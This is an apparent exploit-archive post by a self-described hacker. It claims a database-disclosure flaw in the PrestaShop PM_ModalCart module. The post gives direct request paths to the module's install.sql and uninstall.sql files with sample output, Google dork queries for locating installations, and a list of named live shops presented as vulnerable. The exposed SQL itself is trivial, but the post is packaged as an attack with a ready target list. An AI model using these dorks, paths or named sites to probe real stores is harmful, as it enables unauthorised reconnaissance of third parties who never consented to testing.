PrestaShop PM_ModalCart 1.6.1.4 Database Disclosure

PrestaShop PM_ModalCart version 1.6.1.4 suffers from a database disclosure vulnerability.


MD5 | d470400ffc2213bdbbab683cdb5057b1

#################################################################################################

# Exploit Title : PrestaShop PM_ModalCart 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+
prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 -
1.6.1.4A+-
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''A(c)2018 Recettes & Cabas | Tous droits rA(c)servA(c)s''
intext:''Agence de communication - Une rA(c)alisation Communikey''
intext:''cron module by samdha.net''
intext:''A(c) 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Exploit :

/modules/pm_modalcart/install.sql

/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Example SQL Database Information Exposure =>

install.sql =>

INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`)
VALUES ('MCAbove',
'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`)
VALUES ('MCBelow',
'Modalcart below', 'On modal, below the product added to cart', 1);

uninstall.sql

DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';

#################################################################################################

# Example Vulnerable Sites =>

[+] recettesetcabas.com/modules/pm_modalcart/install.sql

[+] boutique-solidaire.com/modules/pm_modalcart/install.sql

[+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql

[+] kakicrazy.fr/modules/pm_modalcart/install.sql

[+] visuashop.fr/modules/pm_modalcart/install.sql

[+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql

[+] km-justering.dk/modules/pm_modalcart/install.sql

[+] securedirect.dk/modules/pm_modalcart/install.sql

[+] griffin.ch/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team

#################################################################################################

Related Posts